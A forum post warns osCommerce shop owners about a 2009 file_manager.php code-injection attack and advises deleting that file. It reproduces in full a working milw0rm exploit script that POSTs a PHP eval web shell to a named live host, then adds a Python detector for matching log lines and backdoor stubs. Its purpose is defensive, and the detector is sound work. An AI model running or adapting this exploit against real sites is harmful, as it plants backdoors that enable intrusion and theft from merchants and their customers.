Recently a couple of sites (including my own) have been hacked using a new exploit. Please have a look at this thread http://forums.oscommerce.com/index.php?showtopic=344272. The attacker installed a backdoor (c99madShell) and also added a stub into each and every php file on the site that would execute some code (don't know yet for what purpose) each time any page on your site is called up.
This hack uses a recently discovered code injection exploit with file_manager.php. PLEASE NOTE: None of the measures in the "Secure your Site" thread prevent this attack! On my site all contributions mentioned in the thread are installed and active, and all folder and file attributes are set correctly, but I still got hacked. And I just tried the exploit with the script (see below) again, and it still works when I reactivate the file manager.
There is only ONE method to prevent this:
Rename or delete file_manager.php, so the attacker does not find it!!!
Here is the attack script. If you think you are safe, just insert your hostname in $host, put this file on your server (or run it locally in xampp), and see what you get when you visit the link it shows after running.
I would appreciate it if a mod could make this sticky, so it gets noticed by everybody!
Thanks
Reiner
<?php
print_r('
+---------------------------------------------------------------------------+
osCommerce Online Merchant 2.2 RC2a RCE Exploit
by Flyh4t
mail: phpsec@hotmail.com
team: http://www.wolvez.org
dork: Powered by osCommerce
Gr44tz to q1ur3n 、puret_t、uk、toby57 and all the other members of WST
Thx to exploits of blackh
+---------------------------------------------------------------------------+
');
$host ='democn.51osc.com';
$path = '/';
$admin_path = 'admin/';
$shellcode = "filename=fly.php&file_contents=test<?php%20@eval(\$_POST[aifly]);?>";
$message="POST ".$path.$admin_path."file_manager.php/login.php?action=save HTTP/1.1\r\n";
$message.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
$message.="Accept-Language: zh-cn\r\n";
$message.="Content-Type: application/x-www-form-urlencoded\r\n";
$message.="Accept-Encoding: gzip, deflate\r\n";
$message.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$message.="Host: $host\r\n";
$message.="Content-Length: ".strlen($shellcode)."\r\n";
$message.="Connection: Close\r\n\r\n";
$message.=$shellcode;
$fd = fsockopen($host,'80');
if(!$fd)
{
echo '[~]No response from '.$host;
die;
}
fputs($fd,$message);
echo ("[+]Go to see U webshell : $host/fly.php");
?>
# milw0rm.com [2009-08-31]
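For anyone checking whether their shop has already been hit, here is a small detection script I put together from what the post above describes. It is an added example, not part of the original post or of osCommerce. It does two things: scans web server access log lines for the request shape the exploit sends (a POST to file_manager.php with an extra path segment such as /login.php and action=save, followed by a fetch of the dropped .php file from the same address), and scans PHP source files for the kind of stub the exploit writes (eval on request data) and for the c99 shell banner. The log lines, file contents and IP addresses in the block are constructed samples; the regular expressions are heuristics I chose, not signatures taken from the post, and the admin/ path is assumed to be the stock one.

```python
import os
import re
from typing import Dict, List

# Apache/nginx "combined" access log format (constructed sample lines below).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Request shape used by the exploit in the post: file_manager.php with a path-info
# segment appended ("/login.php") and action=save. The stock admin UI never appends
# path-info to file_manager.php, so this alone is a strong signal.
PATHINFO_RE = re.compile(r'/file_manager\.php/[^?\s]+', re.IGNORECASE)
# Any other access to file_manager.php: worth listing, since the advice is to remove it.
FILE_MANAGER_RE = re.compile(r'/file_manager\.php(?:[/?]|$)', re.IGNORECASE)

# Source indicators: the exploit drops "<?php @eval($_POST[aifly]);?>" and the post
# reports a c99madShell backdoor. These are my generic heuristics for both.
SOURCE_PATTERNS = {
    'eval_on_request_data': re.compile(
        r'@?\s*eval\s*\(\s*\$_(?:POST|GET|REQUEST|COOKIE)\b', re.IGNORECASE),
    'c99_shell_marker': re.compile(r'c99(?:mad)?shell', re.IGNORECASE),
}


def classify_request(target: str) -> str:
    """Return 'attack', 'file_manager' or '' for one request target (path + query)."""
    if PATHINFO_RE.search(target):
        return 'attack'
    if FILE_MANAGER_RE.search(target):
        return 'file_manager'
    return ''


def scan_access_log(lines: List[str]) -> List[dict]:
    """Flag exploit-shaped requests and later .php fetches from the same client IP."""
    hits, attackers = [], set()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        ip, target = m['ip'], m['target']
        kind = classify_request(target)
        if kind == 'attack':
            attackers.add(ip)
        elif not kind and ip in attackers and target.split('?')[0].lower().endswith('.php'):
            kind = 'follow_up'  # e.g. the attacker fetching the file it just dropped
        if kind:
            hits.append({'ip': ip, 'ts': m['ts'], 'method': m['method'],
                         'target': target, 'status': m['status'], 'kind': kind})
    return hits


def scan_php_source(source: str) -> List[str]:
    """Names of the SOURCE_PATTERNS that match one PHP file's contents."""
    return [name for name, rx in SOURCE_PATTERNS.items() if rx.search(source)]


def scan_php_files(files: Dict[str, str]) -> Dict[str, List[str]]:
    """files maps path -> contents; returns only the files with findings."""
    return {path: f for path, src in files.items() if (f := scan_php_source(src))}


def scan_tree(root: str) -> Dict[str, List[str]]:
    """On-disk variant: walk a webroot and apply scan_php_source to every .php file."""
    files = {}
    for dirpath, _, names in os.walk(root):
        for n in names:
            if n.lower().endswith('.php'):
                p = os.path.join(dirpath, n)
                with open(p, 'r', encoding='utf-8', errors='replace') as fh:
                    files[p] = fh.read()
    return scan_php_files(files)


# Constructed sample data (documentation-range IPs, not real hosts or real log data).
SAMPLE_LOG = [
    '203.0.113.5 - - [31/Aug/2009:10:15:02 +0000] "POST /admin/file_manager.php/login.php?action=save HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '203.0.113.5 - - [31/Aug/2009:10:15:03 +0000] "GET /fly.php HTTP/1.1" 200 12 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"',
    '198.51.100.7 - - [31/Aug/2009:10:16:00 +0000] "GET /index.php HTTP/1.1" 200 8400 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [31/Aug/2009:10:17:00 +0000] "GET /admin/file_manager.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
SAMPLE_FILES = {
    'fly.php': 'test<?php @eval($_POST[aifly]);?>',
    'index.php': '<?php require("includes/application_top.php"); ?>',
    'images/.cache.php': '<?php /* c99madShell v. 2.0 */ ?>',
}

if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit['kind'], hit['ip'], hit['method'], hit['target'])
    print(scan_php_files(SAMPLE_FILES))
    # Assumes the stock admin/ directory name; adjust if yours was renamed.
    if os.path.exists(os.path.join('.', 'admin', 'file_manager.php')):
        print('[!] admin/file_manager.php is still present; rename or delete it')
```

Run it from the shop's webroot, or call scan_tree('/path/to/webroot') and scan_access_log(open('access.log').readlines()) against real data. A 'file_manager' hit is only informational; an 'attack' hit means the exploit request shape reached the server and the files that client touched afterwards should be inspected.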